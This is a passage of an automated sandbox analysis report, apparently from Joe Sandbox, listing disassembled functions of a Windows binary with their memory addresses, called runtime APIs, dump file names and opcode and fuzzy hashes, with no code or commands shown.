                                                                                                                                                            • Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                                                                                            • Instruction Fuzzy Hash: 58015E2290C65282E7649B14E40163FB7B1FB85B65F604237E6AD819D8DF7ED424DB00
                                                                                                                                                            Function 00007FF6D6EAB700 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 588628887-0
                                                                                                                                                            • Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                                                                                            • Instruction ID: ea5f59e5fe426ec9f266f4cf3d3ee6f0b638b26f2e056adbb8be70733225fbbc
                                                                                                                                                            • Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                                                                                            • Instruction Fuzzy Hash: C2E0C260F0D30242FF18ABF2989883C12714F88B50F444136ED0DCB391EF2EA8B5C290
                                                                                                                                                            Function 00007FF6D6EA8ECC Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                            • Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                                                                                            • Instruction ID: e7acef23ed89e2d880ffa4aae5db688bc67929b7e33975fa98123bcf44b0baf7
                                                                                                                                                            • Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                                                                                            • Instruction Fuzzy Hash: DDD01214F2C603D1E61437B50C8543D11A42F45B20F500B32D02DC11D0EF1EA1B55151
                                                                                                                                                            Function 00007FF6D6EA8648 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                            • Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                                                                                            • Instruction ID: 531a1279baf696a2d23264050cc87637af1c04023b3f95d7722d8e26e3a72535
                                                                                                                                                            • Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                                                                                            • Instruction Fuzzy Hash: 03D01250F3D64385F61837B91C4583D11B06FC4B31F500A72D01DC12D0EF6EA175A512
                                                                                                                                                            Function 00007FF6D6E97F50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • _findclose.LIBCMT ref: 00007FF6D6E981A9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide_findclose
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2772937645-0
                                                                                                                                                            • Opcode ID: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                                                                                            • Instruction ID: b6496b512900ebccd4b9f42b333cb235d64e78686459025ebedaefcacef614ee
                                                                                                                                                            • Opcode Fuzzy Hash: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                                                                                            • Instruction Fuzzy Hash: C2717F52E1CBC581E611CB2CD5052FD6360FBA9B4CF55E322DB9C525A2EF29E2E9C700
                                                                                                                                                            Function 00007FF6D6EACC5C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction ID: 92dedb387146e4880d480692404905750d2861029bbbd0296fee52c9aeb69e1b
                                                                                                                                                            • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction Fuzzy Hash: 4241B032D1D24187EA64DB29A540A7D77B0EB56B80F141233D68EC7691CF2EE422DB51
                                                                                                                                                            Function 00007FF6D6E985F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                            • Opcode ID: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                                                                                                                            • Instruction ID: fbbf7eb8469993d9dd1f0098333b0e59ac4e0cac8e1f8b76ae2c4b49cc640503
                                                                                                                                                            • Opcode Fuzzy Hash: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                                                                                                                            • Instruction Fuzzy Hash: 95419516E1C78581E7119B24D5112FE6360FFA5748F54A637DF8DC21A3EF29A5E8C310
                                                                                                                                                            Function 00007FF6D6E984C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                            • Opcode ID: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                                                                                            • Instruction ID: 685f39c6ae1b72cf0c12889d0647298d66e4d0f444b3cf981ed45a1aa0d609a6
                                                                                                                                                            • Opcode Fuzzy Hash: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                                                                                            • Instruction Fuzzy Hash: D7218021F0D69286FB509B1269047FFA651BF45BD8F884833EE0E87796DE3EE465C600
                                                                                                                                                            Function 00007FF6D6EAC6EC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction ID: 61608251ce2e8e1e49c1f0010b6d672587e6fa58b3a5b31af8f1a262681ead28
                                                                                                                                                            • Opcode Fuzzy Hash: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C232E1C64285F711AB658881B7C2670AF84FA1F510237EA1DCB3D2CF7EE8619791
                                                                                                                                                            Function 00007FF6D6EAA715 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                            • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction ID: 133ec2b65bd704d79ba9fff0253a1e403bef7a34a0aa3b07ff4ee8ab745b0063
                                                                                                                                                            • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction Fuzzy Hash: 74218136E08B0589EB258F69C484AFD37B0EB44718F440636E61D86AD9EF39D4A5CB80
                                                                                                                                                            Function 00007FF6D6EA69E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction ID: daa554d094ff017eb726764057cf27f08b5c2d355c5bf73e668275b9056b3232
                                                                                                                                                            • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction Fuzzy Hash: 32117521E1D68181EA609F519510A7DA3B0BF86B84F544033EB8CD7B96CF3EE5208741
                                                                                                                                                            Function 00007FF6D6EB748C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction ID: 56bd8f2b5d61d1842ea56edc2e08e42a794c68dd48c319f7245d084d226e843f
                                                                                                                                                            • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction Fuzzy Hash: AB21A732E1CB4146DB618F18E44077D77A1EB84B94F144236E65DC7AD9DF3ED8218B00
                                                                                                                                                            Function 00007FF6D6EA0CEC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction ID: 64be4829226295352e955bc51091af81597aa4b0ae380b10287a25510ce009ca
                                                                                                                                                            • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction Fuzzy Hash: BB018422E1C74141EA04DB52990057DA7B5BF85FE4F484632EE6C97BDADE3EE5218700
                                                                                                                                                            Function 00007FF6D6EAF948 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6D6EAC196,?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6), ref: 00007FF6D6EAF99D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction ID: 3774e2946e492803340649bd4f77685af39ebae5fa4965501ef7be27eef943c1
                                                                                                                                                            • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction Fuzzy Hash: 4FF09015F0E30791FE556BE69654BBD92B15FC8B80F4C4132CD0ECA3C9DE2EE4A18222
                                                                                                                                                            Function 00007FF6D6EAE3AC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6D6EA1514,?,?,?,00007FF6D6EA2A26,?,?,?,?,?,00007FF6D6EA4019), ref: 00007FF6D6EAE3EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction ID: 5502add1680b5a77139ae6703eff91b8a628c8303761691e10890b87c4979e0e
                                                                                                                                                            • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction Fuzzy Hash: 02F0A710F1D34745FE1867765859E7D12A08F847A0F0D0732DD2ECA3D5DE1FE465A121

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00007FF6D6E9C8BC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                                                                                            • Instruction ID: 350bb554841daf5f90d588f66cf64f75dbfe19f22bb93bcdbd56801c95532167
                                                                                                                                                            • Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                                                                                            • Instruction Fuzzy Hash: FA314D72A0DB818AEB609F64E8403ED7364FB84B48F04403BDA4D97B94DF39D658C710
